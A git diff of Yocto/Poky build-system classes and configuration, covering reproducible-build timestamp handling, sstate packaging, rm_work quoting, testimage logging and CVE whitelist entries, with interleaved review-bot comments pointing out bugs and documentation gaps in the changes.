+https?$://downloads.yoctoproject.org/releases/uninative/ https://mirrors.kernel.org/yocto/uninative/ \n \ +https?$://downloads.yoctoproject.org/mirror/sources/ https://mirrors.kernel.org/yocto-sources/ \n \ " # Use MIRRORS to provide git repo fallbacks using the https protocol, for cases diff --git a/poky/meta/classes/package.bbclass b/poky/meta/classes/package.bbclass index 3ff74c9f31..702427fecc 100644 --- a/poky/meta/classes/package.bbclass +++ b/poky/meta/classes/package.bbclass @@ -1989,12 +1989,12 @@ python package_do_pkgconfig () { for pkg in packages.split(): pkgconfig_provided[pkg] = [] pkgconfig_needed[pkg] = [] - for file in pkgfiles[pkg]: + for file in sorted(pkgfiles[pkg]): m = pc_re.match(file) if m: pd = bb.data.init() name = m.group(1) - pkgconfig_provided[pkg].append(name) + pkgconfig_provided[pkg].append(os.path.basename(name)) if not os.access(file, os.R_OK): continue with open(file, 'r') as f: 
@@ -2017,7 +2017,7 @@ python package_do_pkgconfig () { pkgs_file = os.path.join(shlibswork_dir, pkg + ".pclist") if pkgconfig_provided[pkg] != []: with open(pkgs_file, 'w') as f: - for p in pkgconfig_provided[pkg]: + for p in sorted(pkgconfig_provided[pkg]): f.write('%s\n' % p) # Go from least to most specific since the last one found wins diff --git a/poky/meta/classes/package_deb.bbclass b/poky/meta/classes/package_deb.bbclass index 790b26aef2..fa8c6c82ff 100644 --- a/poky/meta/classes/package_deb.bbclass +++ b/poky/meta/classes/package_deb.bbclass @@ -315,8 +315,8 @@ do_package_write_deb[dirs] = "${PKGWRITEDIRDEB}" do_package_write_deb[cleandirs] = "${PKGWRITEDIRDEB}" do_package_write_deb[umask] = "022" do_package_write_deb[depends] += "${@oe.utils.build_depends_string(d.getVar('PACKAGE_WRITE_DEPS'), 'do_populate_sysroot')}" -addtask package_write_deb after do_packagedata do_package - +EPOCHTASK ??= "" +addtask package_write_deb after do_packagedata do_package ${EPOCHTASK} PACKAGEINDEXDEPS += "dpkg-native:do_populate_sysroot" PACKAGEINDEXDEPS += "apt-native:do_populate_sysroot" diff --git a/poky/meta/classes/package_ipk.bbclass b/poky/meta/classes/package_ipk.bbclass index c008559e4a..4927cfba00 100644 --- a/poky/meta/classes/package_ipk.bbclass +++ b/poky/meta/classes/package_ipk.bbclass @@ -274,7 +274,8 @@ do_package_write_ipk[dirs] = "${PKGWRITEDIRIPK}" do_package_write_ipk[cleandirs] = "${PKGWRITEDIRIPK}" do_package_write_ipk[umask] = "022" do_package_write_ipk[depends] += "${@oe.utils.build_depends_string(d.getVar('PACKAGE_WRITE_DEPS'), 'do_populate_sysroot')}" -addtask package_write_ipk after do_packagedata do_package +EPOCHTASK ??= "" +addtask package_write_ipk after do_packagedata do_package ${EPOCHTASK} PACKAGEINDEXDEPS += "opkg-utils-native:do_populate_sysroot" PACKAGEINDEXDEPS += "opkg-native:do_populate_sysroot" diff --git a/poky/meta/classes/package_rpm.bbclass b/poky/meta/classes/package_rpm.bbclass index fc9007922a..65587d228b 100644 
--- a/poky/meta/classes/package_rpm.bbclass +++ b/poky/meta/classes/package_rpm.bbclass @@ -743,7 +743,8 @@ do_package_write_rpm[dirs] = "${PKGWRITEDIRRPM}" do_package_write_rpm[cleandirs] = "${PKGWRITEDIRRPM}" do_package_write_rpm[umask] = "022" do_package_write_rpm[depends] += "${@oe.utils.build_depends_string(d.getVar('PACKAGE_WRITE_DEPS'), 'do_populate_sysroot')}" -addtask package_write_rpm after do_packagedata do_package +EPOCHTASK ??= "" +addtask package_write_rpm after do_packagedata do_package ${EPOCHTASK} PACKAGEINDEXDEPS += "rpm-native:do_populate_sysroot" PACKAGEINDEXDEPS += "createrepo-c-native:do_populate_sysroot" diff --git a/poky/meta/classes/patch.bbclass b/poky/meta/classes/patch.bbclass index 25ec089ae1..484d27ac76 100644 --- a/poky/meta/classes/patch.bbclass +++ b/poky/meta/classes/patch.bbclass @@ -131,6 +131,9 @@ python patch_do_patch() { patchdir = parm["patchdir"] if not os.path.isabs(patchdir): patchdir = os.path.join(s, patchdir) + if not os.path.isdir(patchdir): + bb.fatal("Target directory '%s' not found, patchdir '%s' is incorrect in patch file '%s'" % + (patchdir, parm["patchdir"], parm['patchname'])) else: patchdir = s @@ -147,12 +150,12 @@ python patch_do_patch() { patchset.Import({"file":local, "strippath": parm['striplevel']}, True) except Exception as exc: bb.utils.remove(process_tmpdir, True) - bb.fatal(str(exc)) + bb.fatal("Importing patch '%s' with striplevel '%s'\n%s" % (parm['patchname'], parm['striplevel'], str(exc))) try: resolver.Resolve() except bb.BBHandledException as e: bb.utils.remove(process_tmpdir, True) - bb.fatal(str(e)) + bb.fatal("Applying patch '%s' on target directory '%s'\n%s" % (parm['patchname'], patchdir, str(e))) bb.utils.remove(process_tmpdir, True) del os.environ['TMPDIR'] diff --git a/poky/meta/classes/populate_sdk_base.bbclass b/poky/meta/classes/populate_sdk_base.bbclass index b46f1aed27..396792f0f7 100644 --- a/poky/meta/classes/populate_sdk_base.bbclass 
+++ b/poky/meta/classes/populate_sdk_base.bbclass @@ -275,6 +275,7 @@ EOF # substitute variables sed -i -e 's#@SDK_ARCH@#${SDK_ARCH}#g' \ -e 's#@SDKPATH@#${SDKPATH}#g' \ + -e 's#@SDKPATHINSTALL@#${SDKPATHINSTALL}#g' \ -e 's#@SDKEXTPATH@#${SDKEXTPATH}#g' \ -e 's#@OLDEST_KERNEL@#${SDK_OLDEST_KERNEL}#g' \ -e 's#@REAL_MULTIMACH_TARGET_SYS@#${REAL_MULTIMACH_TARGET_SYS}#g' \ diff --git a/poky/meta/classes/reproducible_build.bbclass b/poky/meta/classes/reproducible_build.bbclass index f06e00d70d..3c01dbd5b3 100644 --- a/poky/meta/classes/reproducible_build.bbclass +++ b/poky/meta/classes/reproducible_build.bbclass 
@@ -1,17 +1,38 @@ # reproducible_build.bbclass # -# Sets SOURCE_DATE_EPOCH in each component's build environment. +# Sets the default SOURCE_DATE_EPOCH in each component's build environment. +# The format is number of seconds since the system epoch. +# # Upstream components (generally) respect this environment variable, # using it in place of the "current" date and time. # See https://reproducible-builds.org/specs/source-date-epoch/ # -# After sources are unpacked but before they are patched, we set a reproducible value for SOURCE_DATE_EPOCH. -# This value should be reproducible for anyone who builds the same revision from the same sources. +# The default value of SOURCE_DATE_EPOCH comes from the function +# get_source_date_epoch_value which reads from the SDE_FILE, or if the file +# is not available (or set to 0) will use the fallback of +# SOURCE_DATE_EPOCH_FALLBACK. +# +# The SDE_FILE is normally constructed from the function +# create_source_date_epoch_stamp which is typically added as a postfuncs to +# the do_unpack task. If a recipe does NOT have do_unpack, it should be added +# to a task that runs after the source is available and before the +# do_deploy_source_date_epoch task is executed. +# +# If a recipe wishes to override the default behavior it should set it's own +# SOURCE_DATE_EPOCH or override the do_deploy_source_date_epoch_stamp task +# with recipe-specific functionality to write the appropriate +# SOURCE_DATE_EPOCH into the SDE_FILE. +# +# SOURCE_DATE_EPOCH is intended to be a reproducible value. This value should +# be reproducible for anyone who builds the same revision from the same +# sources. # -# There are 4 ways we determine SOURCE_DATE_EPOCH: +# There are 4 ways the create_source_date_epoch_stamp function determines what +# becomes SOURCE_DATE_EPOCH: # # 1. Use the value from __source_date_epoch.txt file if this file exists. -# This file was most likely created in the previous build by one of the following methods 2,3,4. 
+# This file was most likely created in the previous build by one of the +# following methods 2,3,4. # Alternatively, it can be provided by a recipe via SRC_URI. # # If the file does not exist: @@ -22,20 +43,16 @@ # 3. Use the mtime of "known" files such as NEWS, CHANGLELOG, ... # This works for well-kept repositories distributed via tarball. # -# 4. Use the modification time of the youngest file in the source tree, if there is one. +# 4. Use the modification time of the youngest file in the source tree, if +# there is one. # This will be the newest file from the distribution tarball, if any. # -# 5. Fall back to a fixed timestamp. +# 5. Fall back to a fixed timestamp (SOURCE_DATE_EPOCH_FALLBACK). # -# Once the value of SOURCE_DATE_EPOCH is determined, it is stored in the recipe's SDE_FILE. -# If none of these mechanisms are suitable, replace the do_deploy_source_date_epoch task -# with recipe-specific functionality to write the appropriate SOURCE_DATE_EPOCH into the SDE_FILE. -# -# If this file is found by other tasks, the value is exported in the SOURCE_DATE_EPOCH variable. -# SOURCE_DATE_EPOCH is set for all tasks that might use it (do_configure, do_compile, do_package, ...) +# Once the value is determined, it is stored in the recipe's SDE_FILE. BUILD_REPRODUCIBLE_BINARIES ??= '1' -inherit ${@oe.utils.ifelse(d.getVar('BUILD_REPRODUCIBLE_BINARIES') == '1', 'reproducible_build_simple', '')} +inherit reproducible_build_simple SDE_DIR = "${WORKDIR}/source-date-epoch" SDE_FILE = "${SDE_DIR}/__source_date_epoch.txt" 
@@ -77,49 +94,47 @@ python create_source_date_epoch_stamp() { import oe.reproducible epochfile = d.getVar('SDE_FILE') - # If it exists we need to regenerate as the sources may have changed - if os.path.isfile(epochfile): - bb.debug(1, "Deleting existing SOURCE_DATE_EPOCH from: %s" % epochfile) - os.remove(epochfile) + tmp_file = "%s.new" % epochfile source_date_epoch = oe.reproducible.get_source_date_epoch(d, d.getVar('S')) bb.debug(1, "SOURCE_DATE_EPOCH: %d" % source_date_epoch) bb.utils.mkdirhier(d.getVar('SDE_DIR')) - with open(epochfile, 'w') as f: + with open(tmp_file, 'w') as f: f.write(str(source_date_epoch)) + + os.rename(tmp_file, epochfile) } +EPOCHTASK = "do_deploy_source_date_epoch" + +# Generate the stamp after do_unpack runs +do_unpack[postfuncs] += "create_source_date_epoch_stamp" + def get_source_date_epoch_value(d): - cached = d.getVar('__CACHED_SOURCE_DATE_EPOCH') - if cached: + epochfile = d.getVar('SDE_FILE') + cached, efile = d.getVar('__CACHED_SOURCE_DATE_EPOCH') or (None, None) + if cached and efile == epochfile: return cached - epochfile = d.getVar('SDE_FILE') + if cached and epochfile != efile: + bb.debug(1, "Epoch file changed from %s to %s" % (efile, epochfile)) + source_date_epoch = int(d.getVar('SOURCE_DATE_EPOCH_FALLBACK')) - if os.path.isfile(epochfile): + try: with open(epochfile, 'r') as f: s = f.read() try: source_date_epoch = int(s) - # workaround for old sstate with SDE_FILE content being 0 - use SOURCE_DATE_EPOCH_FALLBACK - if source_date_epoch == 0 : - source_date_epoch = int(d.getVar('SOURCE_DATE_EPOCH_FALLBACK')) - bb.warn("SOURCE_DATE_EPOCH value from sstate '%s' is deprecated/invalid. Reverting to SOURCE_DATE_EPOCH_FALLBACK '%s'" % (s, source_date_epoch)) except ValueError: bb.warn("SOURCE_DATE_EPOCH value '%s' is invalid. 
Reverting to SOURCE_DATE_EPOCH_FALLBACK" % s) source_date_epoch = int(d.getVar('SOURCE_DATE_EPOCH_FALLBACK')) bb.debug(1, "SOURCE_DATE_EPOCH: %d" % source_date_epoch) - else: + except FileNotFoundError: bb.debug(1, "Cannot find %s. SOURCE_DATE_EPOCH will default to %d" % (epochfile, source_date_epoch)) - d.setVar('__CACHED_SOURCE_DATE_EPOCH', str(source_date_epoch)) + d.setVar('__CACHED_SOURCE_DATE_EPOCH', (str(source_date_epoch), epochfile)) return str(source_date_epoch) export SOURCE_DATE_EPOCH ?= "${@get_source_date_epoch_value(d)}" BB_HASHBASE_WHITELIST += "SOURCE_DATE_EPOCH" - -python () { - if d.getVar('BUILD_REPRODUCIBLE_BINARIES') == '1': - d.appendVarFlag("do_unpack", "postfuncs", " create_source_date_epoch_stamp") -} diff --git a/poky/meta/classes/rm_work.bbclass b/poky/meta/classes/rm_work.bbclass index 01c2ab1c78..2d5a56c238 100644 --- a/poky/meta/classes/rm_work.bbclass +++ b/poky/meta/classes/rm_work.bbclass @@ -73,7 +73,7 @@ do_rm_work () { # sstate version since otherwise we'd need to leave 'plaindirs' around # such as 'packages' and 'packages-split' and these can be large. No end # of chain tasks depend directly on do_package anymore. - rm -f $i; + rm -f -- $i; ;; *_setscene*) # Skip stamps which are already setscene versions @@ -90,7 +90,7 @@ do_rm_work () { ;; esac done - rm -f $i + rm -f -- $i esac done @@ -100,9 +100,9 @@ do_rm_work () { # Retain only logs and other files in temp, safely ignore # failures of removing pseudo folers on NFS2/3 server. if [ $dir = 'pseudo' ]; then - rm -rf $dir 2> /dev/null || true + rm -rf -- $dir 2> /dev/null || true elif ! echo "$excludes" | grep -q -w "$dir"; then - rm -rf $dir + rm -rf -- $dir fi done } diff --git a/poky/meta/classes/sstate.bbclass b/poky/meta/classes/sstate.bbclass index 2ff0d6850c..c2720cde92 100644 --- a/poky/meta/classes/sstate.bbclass +++ b/poky/meta/classes/sstate.bbclass 
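Review bot: `get_source_date_epoch_value` in reproducible_build.bbclass no longer treats a stored value of 0 specially, yet the header comment rewritten in the first hunk of this file still says the fallback is used when the file is "not available (or set to 0)". Either drop `(or set to 0)` from that comment or keep a check such as `if source_date_epoch == 0: source_date_epoch = int(d.getVar('SOURCE_DATE_EPOCH_FALLBACK'))`, because an SDE_FILE containing 0 now yields epoch 0. Only `FileNotFoundError` is caught around the `open`, so any other I/O error on the stamp file now propagates; a one-line comment saying that is intended would help the next reader.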
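Review bot: The added `--` in `do_rm_work` stops a name beginning with `-` from being parsed as an option, but `$i` and `$dir` are still unquoted, so a path containing whitespace or glob characters is split or expanded before `rm` sees it. Quote the operands: `rm -f -- "$i"` and `rm -rf -- "$dir"`, and likewise `[ "$dir" = 'pseudo' ]`. This applies to all three rm_work.bbclass hunks; the loops that set `$i` and `$dir` start outside them.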
@@ -640,10 +640,21 @@ python sstate_hardcode_path () { def sstate_package(ss, d): import oe.path + import time tmpdir = d.getVar('TMPDIR') + fixtime = False + if ss['task'] == "package": + fixtime = True + + def fixtimestamp(root, path): + f = os.path.join(root, path) + if os.lstat(f).st_mtime > sde: + os.utime(f, (sde, sde), follow_symlinks=False) + sstatebuild = d.expand("${WORKDIR}/sstate-build-%s/" % ss['task']) + sde = int(d.getVar("SOURCE_DATE_EPOCH") or time.time()) d.setVar("SSTATE_CURRTASK", ss['task']) bb.utils.remove(sstatebuild, recurse=True) bb.utils.mkdirhier(sstatebuild) @@ -656,6 +667,8 @@ def sstate_package(ss, d): # to sstate tasks but there aren't many of these so better just avoid them entirely. for walkroot, dirs, files in os.walk(state[1]): for file in files + dirs: + if fixtime: + fixtimestamp(walkroot, file) srcpath = os.path.join(walkroot, file) if not os.path.islink(srcpath): continue @@ -677,6 +690,11 @@ def sstate_package(ss, d): bb.utils.mkdirhier(plain) bb.utils.mkdirhier(pdir) os.rename(plain, pdir) + if fixtime: + fixtimestamp(pdir, "") + for walkroot, dirs, files in os.walk(pdir): + for file in files + dirs: + fixtimestamp(walkroot, file) d.setVar('SSTATE_BUILDDIR', sstatebuild) d.setVar('SSTATE_INSTDIR', sstatebuild) @@ -796,7 +814,7 @@ sstate_task_postfunc[dirs] = "${WORKDIR}" sstate_create_package () { # Exit early if it already exists if [ -e ${SSTATE_PKG} ]; then - [ ! -w ${SSTATE_PKG} ] || touch ${SSTATE_PKG} + touch ${SSTATE_PKG} 2>/dev/null || true return fi @@ -830,7 +848,7 @@ sstate_create_package () { else rm $TFILE fi - [ ! -w ${SSTATE_PKG} ] || touch ${SSTATE_PKG} + touch ${SSTATE_PKG} 2>/dev/null || true } python sstate_sign_package () { 
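Review bot: `fixtimestamp` in `sstate_package` reads `sde` from the enclosing scope, which is only assigned a few lines after the nested `def`, and nothing says why only the `package` task is clamped. Move the `sde = ...` assignment above the helper and add a comment such as `# Clamp mtimes newer than SOURCE_DATE_EPOCH so the packaged tree is reproducible` (assuming that is the intent). When SOURCE_DATE_EPOCH is unset, the `time.time()` fallback makes the clamp effectively a no-op, which deserves a word in the same comment.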
@@ -859,12 +877,12 @@ python sstate_report_unihash() { # sstate_unpack_package () { tar -xvzf ${SSTATE_PKG} - # update .siginfo atime on local/NFS mirror - [ -O ${SSTATE_PKG}.siginfo ] && [ -w ${SSTATE_PKG}.siginfo ] && [ -h ${SSTATE_PKG}.siginfo ] && touch -a ${SSTATE_PKG}.siginfo - # Use "! -w ||" to return true for read only files - [ ! -w ${SSTATE_PKG} ] || touch --no-dereference ${SSTATE_PKG} - [ ! -w ${SSTATE_PKG}.sig ] || [ ! -e ${SSTATE_PKG}.sig ] || touch --no-dereference ${SSTATE_PKG}.sig - [ ! -w ${SSTATE_PKG}.siginfo ] || [ ! -e ${SSTATE_PKG}.siginfo ] || touch --no-dereference ${SSTATE_PKG}.siginfo + # update .siginfo atime on local/NFS mirror if it is a symbolic link + [ ! -h ${SSTATE_PKG}.siginfo ] || touch -a ${SSTATE_PKG}.siginfo 2>/dev/null || true + # update each symbolic link instead of any referenced file + touch --no-dereference ${SSTATE_PKG} 2>/dev/null || true + [ ! -e ${SSTATE_PKG}.sig ] || touch --no-dereference ${SSTATE_PKG}.sig 2>/dev/null || true + [ ! -e ${SSTATE_PKG}.siginfo ] || touch --no-dereference ${SSTATE_PKG}.siginfo 2>/dev/null || true } BB_HASHCHECK_FUNCTION = "sstate_checkhashes" @@ -950,10 +968,11 @@ def sstate_checkhashes(sq_data, d, siginfo=False, currentcount=0, summary=True, found.add(tid) if tid in missed: missed.remove(tid) - except: + except bb.fetch2.FetchError as e: missed.add(tid) - bb.debug(2, "SState: Unsuccessful fetch test for %s" % srcuri) - pass + bb.debug(2, "SState: Unsuccessful fetch test for %s (%s)" % (srcuri, e)) + except Exception as e: + bb.error("SState: cannot test %s: %s" % (srcuri, e)) if len(tasklist) >= min_tasks: bb.event.fire(bb.event.ProcessProgress(msg, len(tasklist) - thread_worker.tasks.qsize()), d) 
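Review bot: In `sstate_checkhashes`, the new `except Exception` branch logs with `bb.error` but, unlike the `FetchError` branch above it, does not call `missed.add(tid)`, so a task whose check fails this way lands in neither `found` nor `missed`. If callers or the progress accounting expect every tid to end up in one of the two sets, add `missed.add(tid)` as the first line of that branch. The function continues outside the hunk, so how `missed` is consumed is not visible here.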
@@ -1041,6 +1060,10 @@ def setscene_depvalid(task, taskdependees, notneeded, d, log=None): if taskdependees[task][1] == "do_populate_lic": return True + # We only need to trigger deploy_source_date_epoch through direct dependencies + if taskdependees[task][1] == "do_deploy_source_date_epoch": + return True + # stash_locale and gcc_stash_builddir are never needed as a dependency for built objects if taskdependees[task][1] == "do_stash_locale" or taskdependees[task][1] == "do_gcc_stash_builddir": return True diff --git a/poky/meta/classes/testimage.bbclass b/poky/meta/classes/testimage.bbclass index c709384b91..b1aef626f7 100644 --- a/poky/meta/classes/testimage.bbclass +++ b/poky/meta/classes/testimage.bbclass @@ -193,6 +193,7 @@ def testimage_main(d): import json import signal import logging + import shutil from bb.utils import export_proxies from oeqa.core.utils.misc import updateTestData @@ -228,9 +229,10 @@ def testimage_main(d): tdname = "%s.testdata.json" % image_name try: - td = json.load(open(tdname, "r")) - except (FileNotFoundError) as err: - bb.fatal('File %s Not Found. Have you built the image with INHERIT+="testimage" in the conf/local.conf?' % tdname) + with open(tdname, "r") as f: + td = json.load(f) + except FileNotFoundError as err: + bb.fatal('File %s not found (%s).\nHave you built the image with INHERIT += "testimage" in the conf/local.conf?' % (tdname, err)) # Some variables need to be updates (mostly paths) with the # ones of the current environment because some tests require them. 
@@ -397,10 +399,17 @@ def testimage_main(d): get_testimage_result_id(configuration), dump_streams=d.getVar('TESTREPORT_FULLLOGS')) results.logSummary(pn) + + # Copy additional logs to tmp/log/oeqa so it's easier to find them + targetdir = os.path.join(get_testimage_json_result_dir(d), d.getVar("PN")) + os.makedirs(targetdir, exist_ok=True) + os.symlink(bootlog, os.path.join(targetdir, os.path.basename(bootlog))) + os.symlink(d.getVar("BB_LOGFILE"), os.path.join(targetdir, os.path.basename(d.getVar("BB_LOGFILE") + "." + d.getVar('DATETIME')))) + if not results or not complete: - bb.fatal('%s - FAILED - tests were interrupted during execution' % pn, forcelog=True) + bb.fatal('%s - FAILED - tests were interrupted during execution, check the logs in %s' % (pn, d.getVar("LOG_DIR")), forcelog=True) if not results.wasSuccessful(): - bb.fatal('%s - FAILED - check the task log and the ssh log' % pn, forcelog=True) + bb.fatal('%s - FAILED - also check the logs in %s' % (pn, d.getVar("LOG_DIR")), forcelog=True) def get_runtime_paths(d): """ diff --git a/poky/meta/classes/uninative.bbclass b/poky/meta/classes/uninative.bbclass index 1e19917a97..3c7ccd66f4 100644 --- a/poky/meta/classes/uninative.bbclass +++ b/poky/meta/classes/uninative.bbclass @@ -100,7 +100,7 @@ ${UNINATIVE_STAGING_DIR}-uninative/relocate_sdk.py \ ${UNINATIVE_LOADER} \ ${UNINATIVE_LOADER} \ ${UNINATIVE_STAGING_DIR}-uninative/${BUILD_ARCH}-linux/${bindir_native}/patchelf-uninative \ - ${UNINATIVE_STAGING_DIR}-uninative/${BUILD_ARCH}-linux${base_libdir_native}/libc*.so" % chksum) + ${UNINATIVE_STAGING_DIR}-uninative/${BUILD_ARCH}-linux${base_libdir_native}/libc*.so*" % chksum) subprocess.check_output(cmd, shell=True) with open(loaderchksum, "w") as f: diff --git a/poky/meta/classes/useradd.bbclass b/poky/meta/classes/useradd.bbclass index e5f3ba24f9..0f0ed3446d 100644 --- a/poky/meta/classes/useradd.bbclass +++ b/poky/meta/classes/useradd.bbclass 
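Review bot: The two `os.symlink` calls added ahead of the result checks in `testimage_main` can raise and replace the real test outcome with an unrelated traceback. `os.symlink` fails with `FileExistsError` when the link name already exists in `targetdir`; the task-log link gets a `DATETIME` suffix, but the boot-log link uses `os.path.basename(bootlog)` unchanged, and whether that name is unique per run depends on code outside the hunk. Since the links are only a convenience, I would wrap both calls in `try: ... except OSError as e:` and report the failure with `bb.warn("Could not link logs into %s: %s" % (targetdir, e))`, so that the `bb.fatal` checks below still run. The function body starts outside the hunk.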
@@ -230,6 +230,10 @@ fakeroot python populate_packages_prepend () { preinst += 'perform_useradd () {\n%s}\n' % d.getVar('perform_useradd') preinst += 'perform_groupmems () {\n%s}\n' % d.getVar('perform_groupmems') preinst += d.getVar('useradd_preinst') + # Expand out the *_PARAM variables to the package specific versions + for rep in ["GROUPADD_PARAM", "USERADD_PARAM", "GROUPMEMS_PARAM"]: + val = d.getVar(rep + "_" + pkg) or "" + preinst = preinst.replace("${" + rep + "}", val) d.setVar('pkg_preinst_%s' % pkg, preinst) # RDEPENDS setup diff --git a/poky/meta/classes/utils.bbclass b/poky/meta/classes/utils.bbclass index cd3d05709e..99f68f7505 100644 --- a/poky/meta/classes/utils.bbclass +++ b/poky/meta/classes/utils.bbclass @@ -233,7 +233,7 @@ create_cmdline_wrapper () { #!/bin/bash realpath=\`readlink -fn \$0\` realdir=\`dirname \$realpath\` -exec -a \`dirname \$realpath\`/$cmdname \`dirname \$realpath\`/$cmdname.real $cmdoptions "\$@" +exec -a \$realdir/$cmdname \$realdir/$cmdname.real $cmdoptions "\$@" END chmod +x $cmd } diff --git a/poky/meta/conf/bitbake.conf b/poky/meta/conf/bitbake.conf index 0141919021..91f003d6dd 100644 --- a/poky/meta/conf/bitbake.conf +++ b/poky/meta/conf/bitbake.conf @@ -421,8 +421,10 @@ PKGDATA_DIR = "${TMPDIR}/pkgdata/${MACHINE}" SDK_NAME_PREFIX ?= "oecore" SDK_NAME = "${SDK_NAME_PREFIX}-${SDK_ARCH}-${TUNE_PKGARCH}" -SDKPATH = "/usr/local/${SDK_NAME_PREFIX}-${SDK_ARCH}" +SDKPATH = "/usr/local/oe-sdk-hardcoded-buildpath" SDKPATHNATIVE = "${SDKPATH}/sysroots/${SDK_SYS}" +# The path to default to installing the SDK to +SDKPATHINSTALL = "/usr/local/${SDK_NAME_PREFIX}-${SDK_ARCH}" ################################################################## # Kernel info. 
@@ -500,7 +502,7 @@ HOSTTOOLS += " \ HOSTTOOLS += "${@'ip ping ps scp ssh stty' if (bb.utils.contains_any('IMAGE_CLASSES', 'testimage testsdk', True, False, d) or any(x in (d.getVar("BBINCLUDED") or "") for x in ["testimage.bbclass", "testsdk.bbclass"])) else ''}" # Link to these if present -HOSTTOOLS_NONFATAL += "aws gcc-ar gpg ld.bfd ld.gold nc pigz sftp socat ssh sudo" +HOSTTOOLS_NONFATAL += "aws gcc-ar gpg gpg-agent ld.bfd ld.gold nc pigz sftp socat ssh sudo" # Temporary add few more detected in bitbake world HOSTTOOLS_NONFATAL += "join nl size yes zcat" diff --git a/poky/meta/conf/distro/include/cve-extra-exclusions.inc b/poky/meta/conf/distro/include/cve-extra-exclusions.inc index cf07acce1d..e02a4d1fde 100644 --- a/poky/meta/conf/distro/include/cve-extra-exclusions.inc +++ b/poky/meta/conf/distro/include/cve-extra-exclusions.inc @@ -44,7 +44,14 @@ CVE_CHECK_WHITELIST += "CVE-2010-4756" # exposing this interface in an exploitable way CVE_CHECK_WHITELIST += "CVE-2020-29509 CVE-2020-29511" - +# db +# Since Oracle relicensed bdb, the open source community is slowly but surely replacing bdb with +# supported and open source friendly alternatives. As a result these CVEs are unlikely to ever be fixed. +CVE_CHECK_WHITELIST += "CVE-2015-2583 CVE-2015-2624 CVE-2015-2626 CVE-2015-2640 CVE-2015-2654 \ +CVE-2015-2656 CVE-2015-4754 CVE-2015-4764 CVE-2015-4774 CVE-2015-4775 CVE-2015-4776 CVE-2015-4777 \ +CVE-2015-4778 CVE-2015-4779 CVE-2015-4780 CVE-2015-4781 CVE-2015-4782 CVE-2015-4783 CVE-2015-4784 \ +CVE-2015-4785 CVE-2015-4786 CVE-2015-4787 CVE-2015-4788 CVE-2015-4789 CVE-2015-4790 CVE-2016-0682 \ +CVE-2016-0689 CVE-2016-0692 CVE-2016-0694 CVE-2016-3418 CVE-2020-2981" #### CPE update pending #### 
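Review bot: The new `db` block in `CVE_CHECK_WHITELIST` removes 31 CVE ids from cve-check output, yet its comment only says they are unlikely ever to be fixed, not that they do not apply. The neighbouring entry visible in this hunk is justified by the interface not being exposed "in an exploitable way", so a reader may assume this block means the same. I would extend the comment with a line such as `# NOTE: these are unfixed, not inapplicable; images that ship db remain exposed and should assess them separately.` That keeps the report noise down without hiding the residual risk from anyone who still ships the library.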
@@ -61,10 +68,6 @@ CVE_CHECK_WHITELIST += "CVE-2020-29509 CVE-2020-29511" # There was a proposed patch https://lists.gnu.org/archive/html/qemu-devel/2021-02/msg06098.html # however qemu maintainers are sure the patch is incorrect and should not be applied. -# flex:flex-native https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2019-6293 -# Upstream bug, still open: https://github.com/westes/flex/issues/414 -# Causes memory exhaustion so potential DoS but no buffer overflow, low priority - # wget https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2021-31879 # https://mail.gnu.org/archive/html/bug-wget/2021-02/msg00002.html # No response upstream as of 2021/5/12 diff --git a/poky/meta/conf/distro/include/default-distrovars.inc b/poky/meta/conf/distro/include/default-distrovars.inc index 433d4b6651..0240589c81 100644 --- a/poky/meta/conf/distro/include/default-distrovars.inc +++ b/poky/meta/conf/distro/include/default-distrovars.inc @@ -47,5 +47,5 @@ KERNEL_IMAGETYPES ??= "${KERNEL_IMAGETYPE}" # The CONNECTIVITY_CHECK_URIS are used to test whether we can succesfully # fetch from the network (and warn you if not). To disable the test set # the variable to be empty. -# Git example url: git://git.yoctoproject.org/yocto-firewall-test;protocol=git;rev=master +# Git example url: git://git.yoctoproject.org/yocto-firewall-test;protocol=git;rev=master;branch=master CONNECTIVITY_CHECK_URIS ?= "https://www.example.com/" diff --git a/poky/meta/conf/distro/include/maintainers.inc b/poky/meta/conf/distro/include/maintainers.inc index ef1e7fe2f4..1575fce8c7 100644 --- a/poky/meta/conf/distro/include/maintainers.inc +++ b/poky/meta/conf/distro/include/maintainers.inc 
@@ -4,7 +4,7 @@ # # Please submit any patches against recipes in meta to the # OE-Core mail list (openembedded-core@lists.openembedded.org) -# For recipes in meta-yocto please use the Poky list (poky@yoctoproject.org) +# For recipes in meta-yocto please use the Poky list (poky@lists.yoctoproject.org) # # If you have problems with or questions about a particular recipe, feel # free to contact the maintainer directly (cc:ing the appropriate mailing list @@ -576,6 +576,7 @@ RECIPE_MAINTAINER_pn-python3 = "Oleksandr Kravchuk <open.source@oleksandr-kravch RECIPE_MAINTAINER_pn-python3-async = "Oleksandr Kravchuk <open.source@oleksandr-kravchuk.com>" RECIPE_MAINTAINER_pn-python3-dbus = "Oleksandr Kravchuk <open.source@oleksandr-kravchuk.com>" RECIPE_MAINTAINER_pn-python3-docutils = "Oleksandr Kravchuk <open.source@oleksandr-kravchuk.com>" +RECIPE_MAINTAINER_pn-python3-dtschema-wrapper = "Bruce Ashfield <bruce.ashfield@gmail.com>" RECIPE_MAINTAINER_pn-python3-pycryptodome = "Joshua Watt <JPEWhacker@gmail.com>" RECIPE_MAINTAINER_pn-python3-pycryptodomex = "Joshua Watt <JPEWhacker@gmail.com>" RECIPE_MAINTAINER_pn-python3-extras = "Oleksandr Kravchuk <open.source@oleksandr-kravchuk.com>" diff --git a/poky/meta/conf/distro/include/yocto-uninative.inc b/poky/meta/conf/distro/include/yocto-uninative.inc index 740cca0ecf..3165fc93b8 100644 --- a/poky/meta/conf/distro/include/yocto-uninative.inc +++ b/poky/meta/conf/distro/include/yocto-uninative.inc 
